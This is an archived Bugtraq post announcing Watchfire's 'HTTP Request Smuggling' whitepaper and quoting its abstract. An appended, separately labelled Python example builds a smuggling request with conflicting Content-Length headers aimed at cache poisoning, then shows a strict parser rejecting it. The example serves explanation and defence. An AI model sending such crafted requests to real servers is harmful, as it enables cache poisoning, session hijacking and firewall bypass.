Bugtraq mailing list archives
A new whitepaper by Watchfire - HTTP Request Smuggling
From: Ory Segal <orysegal () netvision net il>
Date: Mon, 06 Jun 2005 19:09:04 +0300
Hello,

Today, Watchfire released a new whitepaper, titled "HTTP Request Smuggling". The full paper can be found at the following link: http://www.watchfire.com/resources/HTTP-Request-Smuggling.pdf

The paper's abstract is copied below:

"We describe a new web entity attack technique: “HTTP Request Smuggling”. The attack technique and the derived attacks are relevant to most web environments and are the result of an HTTP server's or device's failure to properly handle malformed inbound HTTP requests. HTTP Request Smuggling works by taking advantage of the discrepancies in parsing when one or more HTTP devices/entities (e.g. Cache Server, Proxy Server, Web Application Firewall, etc.) are in the data flow between the user and the web server. HTTP Request Smuggling enables various attacks: web cache poisoning, session hijacking, cross-site scripting and, most seriously, the ability to bypass web application firewall protection. HTTP Request Smuggling sends multiple specially-crafted HTTP requests that cause the two attacked entities to see two different sets of requests, allowing the hacker to smuggle a request to one device without the other device being aware of it. In the Web Cache Poisoning attack, this smuggled request will trick the cache server into unintentionally associating a URL with another URL's page (content), and caching this content for the URL. In the Web Application Firewall attack the smuggled request could be a worm (like Nimda or Code Red) or a buffer overflow attack targeting the web server. Finally, because HTTP Request Smuggling enables the attacker to insert or sneak a request into the flow, it allows the attacker to manipulate the web server's request/response sequencing, which can allow for credential hijacking and other malicious outcomes."

Thank you,

Ory Segal
Director of Security Research
Watchfire (Israel) LTD.
Tel: +972-9-9586077, Ext.236 Mobile: +972-54-7739359 e-mail: osegal at watchfire.com
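Worked example, added here as an illustration and not part of Ory Segal's message or of the Watchfire paper: the "discrepancies in parsing" the abstract describes, shown with one concrete instance, a request that repeats Content-Length with two different values. Two minimal request splitters consume the same pipelined byte stream; one honours the first Content-Length, the other the last, and they end up seeing different second requests, which is exactly the "two different sets of requests" the abstract refers to. A third, strict policy shows the check an intermediary should apply instead: refuse a message whose Content-Length values conflict. The host name, the paths and the "first"/"last" policies are assumptions for the demonstration, not the documented behaviour of any named product; Transfer-Encoding framing is deliberately not modelled.

```python
# Added example: two HTTP/1.x request splitters that disagree on the same
# byte stream because the request repeats Content-Length with different
# values. Host names, paths and the "first"/"last" policies are assumptions
# for the demonstration, not the behaviour of any particular product.


def split_requests(stream: bytes, cl_policy: str) -> list:
    """Split a pipelined HTTP/1.x byte stream into (request_line, headers, body).

    cl_policy selects what to do when Content-Length is repeated:
      "first"  - honour the first value
      "last"   - honour the last value
      "strict" - refuse the message if the values conflict (the safe choice)
    Only Content-Length framing is modelled; Transfer-Encoding is out of scope.
    """
    requests = []
    pos = 0
    while pos < len(stream):
        head_end = stream.find(b"\r\n\r\n", pos)
        if head_end == -1:
            break  # incomplete head: a real server would wait for more bytes
        lines = stream[pos:head_end].decode("latin-1").split("\r\n")
        request_line, header_lines = lines[0], lines[1:]
        headers = []
        for line in header_lines:
            name, _, value = line.partition(":")
            headers.append((name.strip().lower(), value.strip()))
        lengths = [int(v) for n, v in headers if n == "content-length"]
        if not lengths:
            length = 0
        elif cl_policy == "first":
            length = lengths[0]
        elif cl_policy == "last":
            length = lengths[-1]
        elif cl_policy == "strict":
            if len(set(lengths)) != 1:
                raise ValueError("conflicting Content-Length values: %r" % lengths)
            length = lengths[0]
        else:
            raise ValueError("unknown policy %r" % cl_policy)
        body_start = head_end + 4
        body = stream[body_start:body_start + length]
        requests.append((request_line, headers, body))
        pos = body_start + length
    return requests


def request_targets(stream: bytes, cl_policy: str) -> list:
    """Return just the request-target (path) of each request a device sees."""
    return [line.split(" ")[1] for line, _, _ in split_requests(stream, cl_policy)]


def accepted_by_strict_device(stream: bytes) -> bool:
    """True if a device applying the strict policy accepts the stream as unambiguous."""
    try:
        split_requests(stream, "strict")
        return True
    except ValueError:
        return False


# Constructed attack stream (sample input, not captured traffic). The bytes
# after the first blank line are counted so that a "last" parser treats them
# as the POST body, while a "first" parser (Content-Length: 0) treats them as
# the start of a second request.
SMUGGLED = (
    b"GET /poison.html HTTP/1.1\r\n"
    b"Host: target.example\r\n"
    b"Bla: "  # deliberately no CRLF: the next request line becomes this header's value
)
STREAM = (
    b"POST /foobar.html HTTP/1.1\r\n"
    b"Host: target.example\r\n"
    b"Content-Length: 0\r\n"
    + b"Content-Length: %d\r\n" % len(SMUGGLED)
    + b"\r\n"
    + SMUGGLED
    + b"GET /page_to_poison.html HTTP/1.1\r\n"
    b"Host: target.example\r\n"
    b"\r\n"
)


if __name__ == "__main__":
    print("device honouring first Content-Length sees:", request_targets(STREAM, "first"))
    print("device honouring last Content-Length sees: ", request_targets(STREAM, "last"))
    print("strict device accepts the stream:", accepted_by_strict_device(STREAM))
```

The device honouring the first value sees /foobar.html followed by /poison.html; the device honouring the last value sees /foobar.html followed by /page_to_poison.html. Both read every byte, and neither sees anything malformed by its own rules, which is why the smuggled request goes unnoticed. If the device honouring the last value is the cache and the one honouring the first value is the web server, the cache pairs the web server's second response (the content of /poison.html) with its own second request (/page_to_poison.html) and stores it under that URL; that is the cache-poisoning outcome the abstract mentions. The strict policy refuses the message outright, which removes the ambiguity both devices would otherwise resolve differently.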